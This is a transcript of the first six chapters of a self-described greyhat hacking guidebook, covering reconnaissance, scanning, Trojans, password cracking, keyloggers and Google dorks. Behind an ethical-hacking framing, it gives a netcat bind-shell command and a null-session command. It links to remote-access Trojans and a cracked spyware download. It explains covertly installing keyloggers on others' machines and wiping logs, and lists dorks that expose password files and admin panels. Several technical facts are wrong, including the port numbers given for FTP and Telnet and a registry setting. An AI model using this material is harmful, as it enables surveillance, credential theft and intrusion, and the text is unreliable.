hackdecoders- book by hitesh malviya

132
Hackdecoders v 1.0 Official Guide to Greyhat Hacking “If you come to know the hacker’s mind then you can’t be hacked” Hitesh Malviya (B. Tech, C!EH, EC!SA, MCITP, CCNA) www.brtricks.com

Upload: nikola-stanisic

Post on 30-Oct-2014

147 views

Category:

Documents


8 download

TRANSCRIPT

Page 1: Hackdecoders- Book by Hitesh Malviya

Hackdecoders v 1.0

Official Guide to Greyhat Hacking

“If you come to know the hacker’s mindthen you can’t be hacked”

Hitesh Malviya(B. Tech, C!EH, EC!SA, MCITP, CCNA)

www.brtr

icks.c

om

Page 2: Hackdecoders- Book by Hitesh Malviya

Legal Disclaimer

Any proceedings or activities related to the material contained within thisvolume are exclusively your liability. The misuse and mistreat of theinformation the book can Consequence in unlawful charges brought againstthe persons in question. The authors and review analyzers will not to be heldresponsible in the event any unlawful charges brought against anyindividuals misusing the information this book to break the law. This bookcontains material and resources that can be potential destructive. If you don’tfully comprehend something on this book, don’t study this book. Please referto the laws and acts of your state/region/province /zone/ territory or countrybefore accessing, using or in any other way utilizing these resources.

These materials and resources are for educational purpose only. Don’tattempt to violate the law with anything enclosed here within. Neither writerof this book, review analyzers, the publishers nor anyone else affiliated inany way, is going to admit any responsibility for your proceedings, actionsor trials.

www.brtr

icks.c

om

Page 3: Hackdecoders- Book by Hitesh Malviya

About the Author

Hitesh Malviya is an independent Information security Researcher,Certified Ethical Hacker & Ethical Hacking trainer and has a familiarity artof knowledge in computer field. Malviya, is more Recognized for Indian No.1 Ethical Hacking Forum Hindustan Cyber Force. He is the founder personof Hindustan Cyber Force.

He has found serious vulnerabilities in Top social networking websites orkutand facebook. He is continuously working in filed of cyber security to securemost Indian domain websites.

Presently, Hitesh Malviya is working with HCF Infosec Limited as Chiefexecutive officer and with RRN Technologies as Penetration tester.

Qualifications: MCP, MCTS, MCITP, CCNA, C!EH, EC!SA

www.brtr

icks.c

om

Page 4: Hackdecoders- Book by Hitesh Malviya

Preface

Computer Hacking is the art of exploitation. It is the way enter into creator’ssystem without having his knowledge and carry out some changes in hisoriginal creation. Persons involved in these activities are usually known ashackers.

Hacking doesn’t mean to steal someone confidential information, crackingdata, cracking system and all criminal activities. Mostly peoplemisunderstood us as criminal.

Ethical Hackers are those people who use their depth knowledge to securecompanies, organization networks from crackers. They are cops behindcrackers and blackhat hackers.

At Present time, Cyber threats are on their top. Exploits are easily availableon internet By using them any technical sound person can hack into yoursystem or website, so awareness is must to be protect yourself from thesetype of cyber attacks and latest threats.

After reading this book you will come to know about ethical hacker’s jobroles and tactics and methods used by them to secure networks and systems.You will come to know about hacker’s mind because once you come toknow this after that you can’t be hacked.

“If you come to know the hacker’s mind then youCan’t be hacked”

- Hitesh Malviya (Ethical Hacker)

www.brtr

icks.c

om

Page 5: Hackdecoders- Book by Hitesh Malviya

Acknowledgements

Book or Volume of this temperament is tremendously complex to write,particularly without support of the Almighty GOD.

I express heartfelt credits to My parents Mr. O. R. Solanki & Mrs.Bhawana Solanki without them I have no existence. All together, I amthankful Mr. Chandshekar Rathinam, Mr. Moin Ahmed, Arjun Tyagi, Jatingarg, Neeraj dhiman, Ashish Saini and all Hindustan cyber force crewmembers and all individuals who facilitated me at various stage of thisvolume.

To finish, I am thankful to you also as you are reading this book. I am surethat it will make creative and constructive role to build your digital life moresecure and aware than ever before.

www.brtr

icks.c

om

Page 6: Hackdecoders- Book by Hitesh Malviya

Contents at a Glance

Chapter 1 Introduction to Ethical Hacking…………….8-10Chapter 2 Information Gathering & footprinting……...11-14Chapter 3 Scanning & Enumeration…………………..15-25Chapter 4 Trojans and Backdoors……………………..26-36Chapter 5 System Hacking…………………………….37-44Chapter 6 Google Hacking (Basic & advanced)……….45-51Chapter 7 Sql injection and countermeasures………….52-66Chapter 8 Cross site scripting and Countermeasures…..67-72Chapter 9 Remote File inclusion and

Countermeasures……………………………73-76Chapter 10 Email account cracking & security………….77-85Chapter 11 Facebook account hacking & security……….86-94Chapter 12 Facebook clickjacking……………………….95-102Chapter 13 VPN & Proxies…………………………….103-113Chapter 14 Hacking Mobile Phones, PDA, Handheld

Devices…………………………………….114-124Chapter 15 Career certifications in Information

Security…………………………………….125-131

www.brtr

icks.c

om

Page 7: Hackdecoders- Book by Hitesh Malviya

Chapter 1 Introduction

Objectives:

Hacker Classes Essential Terminologies Ethical Hacking Steps to perform Ethical Hacking What Ethical Hackers Do?

www.brtr

icks.c

om

Page 8: Hackdecoders- Book by Hitesh Malviya

Hacking is the art to gain unauthorized access to computer systems and networks.Persons behind the scene are called as Hackers. Sometimes, Hacking can be defined asmake some changes in system’s code lead to the malicious change into the system.

Hacker Classes

Hackers can be divided in three classes:-

White Hat: - These are security guys, work as security consultants to secure companiesnetwork from cyber threats and attacks. They provide solution to defend against cyberthreats. They also know as Ethical Hackers.

Black Hat: - These are bad guys, they use their skills in destructive manner, they arehighly skilled technology geeks use their skills in cracking servers and networks.

Grey Hat: - Hacker who works in both offensive and defensive manner is called Greyhat. It is called most sophisticated category of hacker.

Essential Terminologies

Threat: - An action or event that might compromise security, Threat is a potentialviolation of security.

Vulnerability: - Existence of weakness in design, or unexpected error can lead tounexpected and undesirable event is called vulnerability.

Attack: - An attack is an action that violates security.

www.brtr

icks.c

om

Page 9: Hackdecoders- Book by Hitesh Malviya

Exploit: - Exploit is the defined way to breach security, It is used to gain unauthorizedaccess to systems.

Ethical Hacking

Ethical Hacking is the methodology to protect against Cyber threats or attacks. Personbehind the scene are called Ethical Hackers. Ethical Hacker provide shield to computernetworks and systems to protect against cyber threats and attacks.

Steps to perform Ethical Hacking

(1)Information Gathering: It is the first step of ethical Hacking, It can be performed intwo ways active and passive.

Active information gathering can be performed inside the network and passive can beperformed outside the network.Various online tools and remote application tools are used for this purpose.

(2)Scanning: In this phase, scanning for live hosts is performed by using port scanners.Nmap is the one of best tool used for scanning purpose by Ethical Hackers

(3)Gaining Access: It is the penetration phase, Hacker exploits vulnerability to gainaccess to the system.

(4)Maintaining Access: Hacker Change ownership of the system in this phase and installbackdoor to the system for further access.

(5)Clearing Tracks: Clearing tracks refers to the activity to clean all log files from thecompromised system. Various Log cleaners is used for this purpose.

www.brtr

icks.c

om

Page 10: Hackdecoders- Book by Hitesh Malviya

What Ethical hackers do?

“If you know the enemy and know yourself, you need not fear theresult of a hundred battles”

-Sun Tzu (Art of war)

Ethical Hackers try to answer the following questions: What can Intruder (Attacker) see on the target system?

(Information gathering and scanning phase) What can Intruder do with the information?

(Gaining access and maintaining access phase) Does anyone at the target notice the intruder’s attempts or successes? (Covering

Tracks phases)

www.brtr

icks.c

om

Page 11: Hackdecoders- Book by Hitesh Malviya

Chapter 2 Information Gathering

Objectives:

Information Gathering Methods

IP Address Lookup

Extracting archive of website

Mobile number Lookup

Email spiders

www.brtr

icks.c

om

Page 12: Hackdecoders- Book by Hitesh Malviya

Information gathering is the first step towards hacking of any system or companynetworks. You need to gather information about system or company network beforelaunching an attack.

Search engines Google, Yahoo, Bing can also be used in information gathering purpose.The use of Google search engine to retrieve information is known as Google hacking.Yahoo people and Google groups also proved helpful to retrieve information about anyperson or organization.

Information Gathering Methods

Domain Name lookup & Whois: - Finding information about particular domain nameis called domain whois lookup, several websites provide this service. We just have toprovide domain name, Lookup utility will retrieve all information about domain anddomain administrator.Some websites which provides this utility:

http://www.whois.com/http://who.is/http://www.networksolutions.com/whois/index.jsp

www.brtr

icks.c

om

Page 13: Hackdecoders- Book by Hitesh Malviya

We can also use tools for this purposeHere are some tools with download link:-

SmartWhoisDownload Link: http://download.cnet.com/SmartWhois/3000-2085_4- 10059497.html

ActiveWhoisDownload Link: http://download.cnet.com/Active-Whois/3000-2085_4-10205156.html

CountryWhoisDownload Link: http://www.softpedia.com/progDownload/CountryWhois-Download-39324.html

DNS Lookup: DNS lookup utility is used for finding information about DNS records andname servers of any particular domain.

NSLOOKUP Command: nslookup is in-built command line command used forretrieving information about dns records.Few parameters are used in process of gathering dns information

(1)To retrieve authoritative name server dns record>nslookup domain name>set type=a>nslookup

(2) To retrieve information about Mail Exchange serverRecords>nslookup domain name>set type=mx>nslookup

(3) To retrieve information about CNAME records>nslookup domain name>set type=cname>nslookup

(4) To retrieve information about all dns records>nslookup domain name>set type=all>nslookup

Here is some websites which provides online tools for dnslookup.http://www.dnswatch.info/http://www.dnsstuff.com/

www.brtr

icks.c

om

Page 14: Hackdecoders- Book by Hitesh Malviya

IP address Lookup:

IP address always plays important role during committing of a cyber crime. We can getinformation about ip address using some online tools,

http://www.ipgetinfo.com/http://ip-lookup.net/

Extracting archive of website:

You can get all information about company’s website since the time it was launched atwww.archive.orgYou can use cache option in Google search results to get the archives of the website.

Mobile Number Lookup:

You can get all information about any mobile number like (Location, service provider,GPS location etc.) by using these online tools.

http://www.internet4mobile.com/mobile_number_information.aspxhttp://www.india-cellular.com/mobile-number-locator.aspxhttp://www.phonecellnumberlookup.com/http://www.trace.bharatiyamobile.com/

Email Spiders:

Email spider is the application used for retrieve all email address inside any particularwebsite. It used for gathering information about working email addresses of anycompany.

www.brtr

icks.c

om

Page 15: Hackdecoders- Book by Hitesh Malviya

Here is some email spider tools:-Power Email collector tool:

Download link-http://www.filebuzz.com/findsoftware/Power_Email_Collector/1.html

www.brtr

icks.c

om

Page 16: Hackdecoders- Book by Hitesh Malviya

Chapter 3 Scanning & Enumeration

Objectives:

Port scanning Network scanning Vulnerability scanning Banner grabbing Scanning using Nmap Enumeration NetBIOS Enumeration Enumerating user accounts

www.brtr

icks.c

om

Page 17: Hackdecoders- Book by Hitesh Malviya

Scanning is performed in preliminary steps before launching an attack. Scanning isperformed to find followingInformation about the system,Specific IP addressesOperating systemsSystem ArchitectureServices running on system

Various Scanners are used for this scanning purpose.Types of Scanning(1)Port Scanning(2)Network scanning(3)Vulnerability Scanning

Port Scanning

Port Scanning is performed for intelligence gathering about open ports about the system.Each service occupied a fixed port number to run. Here are some services which run onfollowing port Numbers:

HTTP 80FTP 23TELNET 25TCP 135,139,445HTTPS 443

Port scanning is used by hacker to getting information about unknown ports on thesystem by using the port they can gaining access to the system.

www.brtr

icks.c

om

Page 18: Hackdecoders- Book by Hitesh Malviya

Here is some port Scanners can be used for this purpose, you can download from givendownload links below and try your hands on it.

SuperScan: A windows only port scanner, pinger and resolver.

Download Link: http://www.foundstone.com/us/resources/proddesc/superscan.htm

AngryIPScanner: IP address and port Scanner.

Download Link: http://www.angryziber.com/ipscan/

www.brtr

icks.c

om

Page 19: Hackdecoders- Book by Hitesh Malviya

UnicornScan: Not your mother’s port scanner.http://www.unicornscan.org/

Scanrand: An unusually fast stateless network service and topology discover system.http://www.doxpara.com/

Network Scanning

Networking scanning is the way of intelligence gathering about alive and dead hosts inthe network. Various Network scanners are used for this purpose. We can also use pingcommand for finding active hosts on the network.

Here are some Network scanners with download links, you can use these for networkscanning.

SoftPerfect Network Scanner

It is a free multi-threaded IP, NetBIOS and SNMP scanner with a modern interface andmany advanced features. It is intended for both system administrators and general usersinterested in computer security. The program pings computers, scans for listeningTCP/UDP ports and displays which types of resources are shared on the network(including system and hidden).

Download Link: http://www.softperfect.com/download/freeware/netscan.exe

www.brtr

icks.c

om

Page 20: Hackdecoders- Book by Hitesh Malviya

Solarwinds Engineer’s toolset

It includes 49 powerful network management, monitoring and Troubleshooting tools toeasily and effectively manage your network.

Download Link: http://download.cnet.com/SolarWinds-Engineer-s-Toolset/3000-2651_4-10764878.html

Vulnerability Scanning

It is the automated process to identify vulnerabilities in computer systems present in anetwork.Some vulnerability Scanners can be used for this purpose.Here is some Vulnerabilityscanner with download links below:

SAINT

SAINT is another commercial vulnerability assessment tool (like Nessus, ISS InternetScanner, or Retina). It runs on UNIX and used to be free and open source, but is now acommercial product.

www.brtr

icks.c

om

Page 21: Hackdecoders- Book by Hitesh Malviya

Download Link: http://www.lynjonic.com/free_trial.htm

Nessus Vulnerability Scanner

Nessus is a vulnerability scanner which looks for bugs in software. An attacker can usethis tool to violate the security Aspects of a software product.

Features: Plug-in architecture NASL(Nessus attack scripting Language) Can test unlimited number of hosts simultaneously Smart service recognition Smart Plug-ins Up-to-date security vulnerability database

www.brtr

icks.c

om

Page 22: Hackdecoders- Book by Hitesh Malviya

Download Link:- www.tenable.com/products/nessus

Retina Vulnerability Scanner

It can scan every machine on the target network, including a variety of operating systemplatforms, Networking devices, databases and third party or custom applications. It hasmost up-to-date vulnerability database and scanning methodology.

Download Link:- http://www.brothersoft.com/retina-network-security-scanner-223041.html

Banner Grabbing:

Banner grabbing is the technique used for grab the banner of website. You can get headerof website using this technique. Telnet Command line in-built tool is used for thispurpose.

Command: telnet domain name 80 HEAD /HTTP /1.0

Scanning using Nmap

Nmap is the open source utility used for network exploration, it is designed to rapidlyscan large networks.Nmap is used for carry out port scanning, OS Detection,Version detection, ping sweep and many other techniques.

www.brtr

icks.c

om

Page 23: Hackdecoders- Book by Hitesh Malviya

Nmap Scanning options:

-sT(TCP connect scan) -sW(Window scan)-sS(SYN scan) -sR(RPC Scan)-sF(FIN Scan) -sL(List/dns Scan)-sX(XMAS Scan) -PO(don’t ping)-sN(Null Scan) -PT(TCP Ping)-sP(Ping Scan) -PS(SYN Ping)-sU(UDP Scan) -PI(ICMP Ping)-sI(Idle Scan) -PM(ICMPNetmask)

Download Link: www.nmap.org/download.htm

www.brtr

icks.c

om

Page 24: Hackdecoders- Book by Hitesh Malviya

Enumeration

Enumeration is defined as extraction of usernames, shares, machine names, resources andservices, Enumeration service is conducted in intranet (LAN) environment.

NetBios Enumeration

NetBios is the BIOS information of any domain over network once you extract NetBiosinformation, you can get shares, services and all other information about domain.NetBios Enumeration can be performed by using following windows built in commandline tools:

Using Net View

Net View lists all hosts present in the domain and lists all shares of individual host in thedomain.

Commands:Net view /domainNet view \\<some computer>

Using nbtstat

nbtstat is the inbuilt windows command line tool used to display information about acomputer’s NetBIOS connection and name tables.

Run: nbtstat –A <some ip address> Display protocol status and current TCP/IP connections

Using NBT(NetBios over TCP/IP)nbtstat [-a remotename] [-A IP address] [-c] [-n] [-r] [-R] [-s] [-S] [interval] ]

NetBIOS Nullsessions

The nullsession is often referred to as the holy grail of windows hacking. Null sessionstake advantage of flaws in SMB (server messaging Block)

You can establish a connection with windows host by logging on with null username andpassword.

Dumpsec is a tool used to reveal shares over a null session with the target computer.

www.brtr

icks.c

om

Page 25: Hackdecoders- Book by Hitesh Malviya

Download Link: - http://www.systemtools.com/cgi-bin/download.pl?DumpAcl

Inter process communication (IPC)

Using IPC anyone can shares or resources of any host in domain over network bycreating a null session.Command: c:\net use \\ <ip address>\IPC$ “” /u: “”

Null sessions Countermeasures

Null sessions require access to TCP port 139 and 445. It doesn’t work in windows server2003. You could disable SMB service to prevent from null session.The another way is to restrict anonymous user by edit the registry settings.Step 1. Open regedit32 and navigate to

HKLM\SYSTEM\CurrentControlSet\LSAStep 2. Choose edit | add value

Value name : Restrict Anonymous Data_type: REG_WORD Value: 2

Enumerating User accounts

Two powerful tools are used for this purpose:User2sidSid2user

They can be downloaded at www.chem.msu.su/^rudnyi/NT/

www.brtr

icks.c

om

Page 26: Hackdecoders- Book by Hitesh Malviya

Tool: Getacct, it is also used for retrieve information about user accounts onwindows server 2000/NT machines. It sidesteps “Restrict anonymous=1”.

Download link: www.securityfriday.com

www.brtr

icks.c

om

Page 27: Hackdecoders- Book by Hitesh Malviya

Chapter 4 Trojans or Backdoors

Objectives:

Trojans Types of Trojans Different ways a Trojan can get into your system Indication of Trojan attacks Port numbers use by some known Trojans Some classic Trojans Trojan detecting tools Anti Trojan softwares Backdoor programs countermeasures

www.brtr

icks.c

om

Page 28: Hackdecoders- Book by Hitesh Malviya

Trojans

Trojans are small piece of program code used to infect any computer system. It hides itpresence in the infected system.Attacker sends Trojan to the victim machine when he goes online. Trojan occupied anyport number on machine to run. An Attacker smartly changes the Trojan name with anypredefined service on the machine, after that user can’t recognize if the Trojan exists onthe machine.

Types of Trojans

Remote access Trojan Data sending Trojan Destructive Trojan DOS attack Trojan Proxy Trojan FTP Trojan

Different ways a Trojan can get into your system

Instant messenger application Internet relay chat Attachments Physical access NetBIOS(File sharing) Fake programs Untrusted sites and freeware softwares

Indications of Trojan attacks

CD-Rom drawer opens and closes by itself Wallpaper, screensaver and theme settings changed by themselves. Computer browser goes to a strange and unknown page by itself. Computer shut down and restarts by itself. Taskbar disappears and many other unusual tasks happened by itself without user

interaction

www.brtr

icks.c

om

Page 29: Hackdecoders- Book by Hitesh Malviya

Port Number use by some known Trojans

Backorifice UDP 31337 or 31338Deepthroat UDP 2140 or 3150NetBus TCP 12345 or 12346Whake-a-mole TCP 12361 or 12362

Some Classic Trojans

Tini:

Tini is small Trojan program which is only 3 kb in size and written in assembly language.Tini only listen to port 7777 and runs a command prompt when someone attaches to thisport.An attacker cans telnet to tini server at port 7777 from tini client.

Download Link: http://ntsecurity.nu/toolbox/tini

www.brtr

icks.c

om

Page 30: Hackdecoders- Book by Hitesh Malviya

NetBus

NetBus is a Win-32k based Trojan program. Like Backorifice it allows a remote user toaccess and control the victim machine by the way its internet link. This virus is known asBackdoor.Netbus

Download link: http://www.filestube.com/4c22b3aa2987df5503e9,g/netbus.html

Netcat

Netcat is called swiss-army knife of networking tools. It provides a basic TCP/UDPnetworking subsystem allow users to interact manually or via script with networkapplications. It has built-in source routing capabilities.

Netcat client/Server commands:

Client end: c:>nc <ip> <port>Server end: c:>nc –L –p <port> -t –e cmd.exewww.b

rtrick

s.com

Page 31: Hackdecoders- Book by Hitesh Malviya

Download Link: http://netcat.sourceforge.net/

Beast

Beast is a powerful Remote administration tool (RAT) built with Delphi 7. It providesserver and client. An attacker manages to install beast on the remote machine. It willprovide server to attacker machine.

An attacker can remotely administrator the victim machine, he can send remotecommands through server. It is the most powerful tool, attacker can use many resourcesof victim machine.

Download link:http://www.filestube.com/60e733eececb808203e9,g/Beast-v2-07.html

www.brtr

icks.c

om

Page 32: Hackdecoders- Book by Hitesh Malviya

Trojan detecting Tools:

You can detect Trojan on the remote machine using following tools:

TCP View

Download Link:http://download.cnet.com/TCPView/3000-2094_4-10796077.html

Msconfig utility

www.brtr

icks.c

om

Page 33: Hackdecoders- Book by Hitesh Malviya

Windows in-built command,access through run window.

Hijack this

Download Link:http://download.cnet.com/Trend-Micro-HijackThis/3000-8022_4-10227353.html

Super system Helper tool

www.brtr

icks.c

om

Page 34: Hackdecoders- Book by Hitesh Malviya

Download Link:http://www.filestube.com/7M84mA9A5TaJQhTJxTcXQR/Super-System-Helper-Tool-EXE.html

Anti Trojan Softwares:

TrojanHunter

Download Link:http://download.cnet.com/TrojanHunter/3000-8022_4-10703997.html

Spyware Doctor

www.brtr

icks.c

om

Page 35: Hackdecoders- Book by Hitesh Malviya

Download Link:http://download.cnet.com/Spyware-Doctor/3000-8022_4-10377263.html

Comodo BOclean

Download Link:http://comodo-boclean.en.softonic.com/download

Backdoor programs countermeasures

Most commercial available tools detect backdoor programs before they can causedamage. Educate people not to installApplications downloaded from the internet and email attachments. File integrationmethod can be used for detect backdoor programs on the remote machine.

Tripwire

Tripwire is the system integrity Verifier(SIV). It will periodically scan all those filesand any modification has been occurred in information then an alarm is raised.

www.brtr

icks.c

om

Page 36: Hackdecoders- Book by Hitesh Malviya

Download Link: http://sourceforge.net/projects/tripwire/

MD5sum

MD5sum.exe is the checksum utility. It takes MD5 digital snapshot of system files. Youcan check suspected file’s MD5 with the snapshot checksum.Command: md5sum *.* > md5sum.txt

Download Link: http://www.pc-tools.net/win32/md5sums/

www.brtr

icks.c

om

Page 37: Hackdecoders- Book by Hitesh Malviya

Chapter 5 System Hacking

Objectives:

Password Cracking

Password crackers

Keylogger

Spyware

Keylogger countermeasures

www.brtr

icks.c

om

Page 38: Hackdecoders- Book by Hitesh Malviya

An attacker can access the system by gaining access to the user accounts of remotemachine. He needs to crack the password of user accounts for gaining access to theremote system.

Password Cracking

It is the way to crack the passwords of system. Encrypted passwords are saved in systemdatabase. An attacker use hacking tools to crack these encrypted passwords and afterusing the clear text password he can access to the system.Three Methods are used to crack passwords (Offline attack):

Dictionary word attack

In this method, password can be found using dictionary words saved in dictionary file.Password cracker tries to crack using different passwords from a list. It can be succeedonly with poor passwords. It takes very less time.

Brute-force Attack

It tries all possible combination of words to find a password. It is a time consumingmethod. Time limit to crack password is depended on word length of the password.Sometimes it takes 2-3 days to crack a password. It can be used with string passwords.

Hybrid attack

It is the combination of Dictionary word and brute-force attacks. This technique may beused when the password is non-existing word and the attacker tries some technique tocrack it.

Password Crackers

Abcom PDF Password cracker is the program that break the security of PDFdocuments.

www.brtr

icks.c

om

Page 39: Hackdecoders- Book by Hitesh Malviya

Download Link: http://abcom-pdf-password-cracker- pro.findmysoft.com/download/

L0phtcrack It is the SMB packet capture tool used to crack LC4 segment passwords.

Download Link: http://www.net-security.org/software.php?id=756

RainbowCrack It is the tool used to crack all possible hashes stored in rainbow table.

www.brtr

icks.c

om

Page 40: Hackdecoders- Book by Hitesh Malviya

Download Link: http://www.net-security.org/software.php?id=515

JohntheRipper It is a command line tool designed to crack both UNIX and NTpasswords.

Download Link: http://www.openwall.com/john/

0phcrack it is a windows password cracker based on the faster time memory trade-off. Ituses the rainbow tables. It can crack 99% passwords of (passwords of length 6 or lesscomposed by the characters, alphanumeric passwords of length 7 (Both case) and length8 (lowercase only).

Download Link: http://ophcrack.sourceforge.net/

www.brtr

icks.c

om

Page 41: Hackdecoders- Book by Hitesh Malviya

Keylogger

Keylogger is the remote administration tool used by hackers to record activities on aremote machine. It records keystrokes entered by a user on remote machine, and save alog file on the system. It always works in hidden mode. We can grab all kind of useraccounts by using this tool. We only manage to install keylogger on the remote machine.Once you have managed to install the keylogger on the remote machine, it willperiodically send you log files to your server. There are two types of keyloggers:

Hardware keylogger Software keylogger

Ardamax Keylogger

Ardamax keylogger is a keystroke recorder that captures user’s activity and saves it in anencrypted log file. Logs can be automatically sent to your email address, access tokeylogger is password protected. It runs in invisible mode.

Download Link: http://www.box.net/shared/lidooniyjv

www.brtr

icks.c

om

Page 42: Hackdecoders- Book by Hitesh Malviya

Actual Spy Keylogger

It is designed for hidden computer monitoring. It is capable of capture all strokes, screen,clipboards, website activities and print activities.

Download Link: http://www.4shared.com/file/J28nUoDK/Actual_Spy_3_Crack.html

Spyware

Spyware is a program that records computer activities on a machine. Records Keystrokes Records email messages Records IM Chat sessions Records website visited Records applications opened Captures screenshots

Acespy

It separately record everything that is done on the computer and also can block websitesor programs

www.brtr

icks.c

om

Page 43: Hackdecoders- Book by Hitesh Malviya

Download Link: http://download.cnet.com/AceSpy-Spy-Software/3000-2162_4-10206540.html

eBlaster

It shows what the surveillance target surfs on internet and records all emails,chats,instantmessages, websites visited and keystrokes typed and automatically sends this recordedinformation to the desired email address.

www.brtr

icks.c

om

Page 44: Hackdecoders- Book by Hitesh Malviya

Download Link: http://www.eblaster-download.com/

PCPhoneHome

PCPhoneHome tool tracks stolen laptops, when the stolen laptop is online, it will send astealth message to the predetermined email address containing its exact location.

Install the software and restart the computer Start->run->configmod Enter your email address That’s all Whenever your system is online, you will receive notification through email.

Download Link: www.pcphonehome.com

www.brtr

icks.c

om

Page 45: Hackdecoders- Book by Hitesh Malviya

Keylogger countermeasures

Install antivirus and keep the signatures up-to-date. Use privacy keyboard while entering important user account name or passwords.

You can download privacy keyboard from http://anti-keylogger.com Install Host based IDS system on your system. Install anti-keylogger software on your system.

You can get it from http://www.anti-keyloggers.com/download.html

www.brtr

icks.c

om

Page 46: Hackdecoders- Book by Hitesh Malviya

Chapter 6 Google Hacking(Basic & Advanced)

Objectives:

Error messages Files containing juicy information Advisories & vulnerabilities Files containing usernames Files containing passwords Pages containing login portals Various online devices Vulnerable servers

www.brtr

icks.c

om

Page 47: Hackdecoders- Book by Hitesh Malviya

Google Hacking is the art of grabbing information by using Google search engine. Fewoperators are used for this purpose. Mostly Google hacking is used for finding vulnerablefiles and servers. You can also use Google hacking to filter search results. StringKeywords used for this purpose are called Google dorks. You can get Google hackingdatabase from http://www.hackersforcharity.org/ghdb/ and can try dorks given in thedatabase.

Here is some Example of Google Hacking given below:

Error messages

"Warning: mysql_connect(): Access denied for user: '*@*" "on line" -help -forumThis dork reveals logins to databases that were denied for some reason.

"Parse error: parse error, unexpected T_VARIABLE" "on line" filetype: phpPHP error with a full web root path disclosure

"Warning: mysql_query()" "invalid query"MySQL query errors revealing database schema and usernames.

filetype:log "PHP Parse error" | "PHP Warning" | "PHP Error"This search will show an attacker some PHP error logs which may contain information onwhich an attack can be based.

IIS web server error messagesintitle:"the page cannot be found" "internet information services”This query finds various types of IIS servers. This error message is fairly indicative of asomewhat unmodified IIS server, meaning it may be easier to break into.

www.brtr

icks.c

om

Page 48: Hackdecoders- Book by Hitesh Malviya

Files containing juicy info

"phpMyAdmin" "running on" inurl:"main.php"From phpmyadmin.net : "phpMyAdmin is a tool written in PHP intended to handle theadministration of MySQL over the WWW." Great, easy to use, but lock it down! Thingsyou can do include viewing MySQL runtime information and system variables, showprocesses, reloading MySQL, changing privileges, and modifying or exporting databases.Hacker-fodder for sure!

"robots.txt" "Disallow:" filetype:txtThe robots.txt file serves as a set of instructions for web crawlers. The "disallow" tag tellsa web crawler where NOT to look, for whatever reason. Hackers will always go to thoseplaces first!

allinurl:cdkey.txtcdkeys

exported email addressese-mail address filetype:csv csvLoads of user information including email addresses exported in comma separated fileformat (.cvs). This information may not lead directly to an attack, but most certainlycounts as a serious privacy violation.

filetype:conf inurl:firewall -intitle:cvsThese are firewall configuration files. Although these are often examples or sample files,in many cases they can still be used for information gathering purposes.

filetype:reg "Terminal Server Client"These are Microsoft Terminal Services connection settings registry files. They maysometimes contain encrypted passwords and IP addresses.

Financial spreadsheets: finance.xlsintitle:"Index of" finance.xls

"Hey! I have a great idea! Let's put our finances on our website in a secret directoryso we can get to it whenever we need to!"

www.brtr

icks.c

om

Page 49: Hackdecoders- Book by Hitesh Malviya

Advisories & vulnerabilities

"Active Webcam Page" inurl:8080Active WebCam is a shareware program for capturing and sharing the video streamsfrom a lot of video devices.Known bugs: directory traversal and cross site scripting

"Online Store - Powered by ProductCart"ProductCart is "an ASP shopping cart that combines sophisticated ecommerce featureswith time-saving store management tools and remarkable ease of use. It is widely used bymany e-commerce sites". Multiple SQL injection vulnerabilities have been found in theproduct, they allow anything from gaining administrative privileges (bypassing theauthentication mechanism), to executing arbitrary code.

"Powered by A-CART"A-CART is an ASP shopping cart application written in VBScript. It is comprised of a

number of ASP scripts and an Access database.Security vulnerability in the product allows remote attackers to download the product's

database, thus gain access to sensitive information about users of the product (name,surname, address, e-mail, credit card number, and user's login-password).

"Powered by GTChat 0.95"+"User Login"+"Remember my login information"There is a (adduser) remote denial of service vulnerabilty on version 0.95

Files containing usernames

filetype:reg reg +intext:"internet account manager"This google search reveals users names, pop3 passwords, email addresses, serversconnected to and more. The IP addresses of the users can also be revealed in some cases.

inurl:admin filetype:asp inurl:userlistThis search reveals userlists of administrative importance. Userlists found using thismethod can range from benign "message group" lists to system userlists containingpasswords.

inurl:admin inurl:userlistThis search reveals userlists of administrative importance. Userlists found using thismethod can range from benign "message group" lists to system userlists containingpasswords.

site:extremetracking.com inurl:"login="The search reveals usernames (right in the URL in green) and links to the sites that aresigned up with extremetracking.com. From here an attacker can view any of the sitesstats, including all the visitors to the site that is being tracked, including their IP adresses.

www.brtr

icks.c

om

Page 50: Hackdecoders- Book by Hitesh Malviya

Files containing passwords

ext:phpintext:"$dbms""$dbhost""$dbuser""$dbpasswd""$table_prefix""phpbb_installed"Hacking a phpBB forum. Here you can gather the mySQL connection information fortheir forum database. View the .php info by using Google's cache feature.

filetype:ini wcx_ftpThese searches for Total commander FTP passwords (encrypted) in a file calledwcx_ftp.ini. Only 6 hit at the moment, but there may be more in the future.

filetype:log inurl:"password.log"These files contain cleartext usernames and passwords, as well as the sites associatedwith those credentials. Attackers can use this information to log on to that site as thatuser.

filetype:sql "insert into" (pass|passwd|password)Looks for SQL dumps containing cleartext or encrypted passwords.

Pages containing Login portals

"site info for" "Enter Admin Password"This will take you to the cash crusader admin login screen. It is my first google hack..also try adding index.php at the end, have fun people :)

intext:&quot;vbulletin&quot; inurl:admincpvBulletin Admin Control Panel

inurl:login.aspThis is a typical login page. It has recently become a target for SQL injection.

inurl::2082/frontend -demoThis allows you access to CPanel login dialogues/screens.

Various online devices

intitle:"ipcop - main"IPCop Firewall is a Linux firewall for home and SOHO users. IPCop can be managedfrom a simple web interface (which can be found and managed by Google Hackers ;)

www.brtr

icks.c

om

Page 51: Hackdecoders- Book by Hitesh Malviya

intitle:"IVC Control Panel"intitle:"IVC Control Panel"

intitle:"Live NetSnap Cam-Server feed"Netsnap Online Cameras

intitle:"V1" "welcome to phone settings" password”This is a small search for the Italk BB899 Phone Adaptor login page. iTalkBB is a localand long distance calling service provided by iTalk Broadband Corporation. It combinesvoice and internet networks to provide inbound and outbound long distance and localcalling solutions.

Vulnerable servers

intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"Search for phpMyAdmin installations that are configured to run the MySQL databasewith root privileges.

"html allowed" guestbookWhen this is typed in google it finds websites which have HTML Enabled guestbooks.

"Welcome to PHP-Nuke" congratulationsThis finds default installations of the postnuke CMS system. In many cases, defaultinstallations can be insecure especially considering that the administrator hasn't gottenpast the first few installation steps.

"Welcome to Administration" "General" "Local Domains" "SMTPAuthentication" inurl:adminThis reveals admin site for Argo Software Design Mail Server.

You can download automated google hacking tool for making your effort very easily andsufficiently. Googlag Scanner is the automated tool used for google hacking.www.b

rtrick

s.com

Page 52: Hackdecoders- Book by Hitesh Malviya

Download Link:http://downloadsquad.switched.com/tag/goolag%20scanner/

www.brtr

icks.c

om

